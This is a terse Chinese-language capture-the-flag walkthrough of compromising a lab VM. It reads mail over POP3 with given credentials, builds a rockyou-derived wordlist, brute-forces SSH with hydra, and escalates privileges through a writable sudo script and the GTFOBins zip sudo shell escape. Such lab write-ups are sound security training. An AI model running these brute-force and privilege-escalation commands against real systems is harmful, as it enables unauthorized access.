kali:192.168.111.111
靶机:192.168.111.157
信息收集
端口扫描
访问80端口,提示pop3账号密码 pentester:qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
使用telnet访问pop3
telnet 192.168.111.157 110
user pentester
pass qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
list
retr 1
发现一封邮件
作者提示密码列表可以由rockyou.txt生成
cat /usr/share/wordlists/rockyou.txt | grep bobby > pass.txt
使用hydra爆破ssh
hydra -l bob -P pass.txt 192.168.111.157 -s 2222 ssh -t 64
提权
sudo -l查看权限
查看改脚本权限
la -al /opt/scripts/check.sh
当前用户对该脚本具有写入权限,在脚本里写入/bin/bash -p 命令
运行该脚本,切换到my2user用户
sudo -u my2user /bin/bash /opt/scripts/check.sh
my2user用户sudo -l
提权方法https://gtfobins.github.io/gtfobins/zip/#sudo
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
获得flag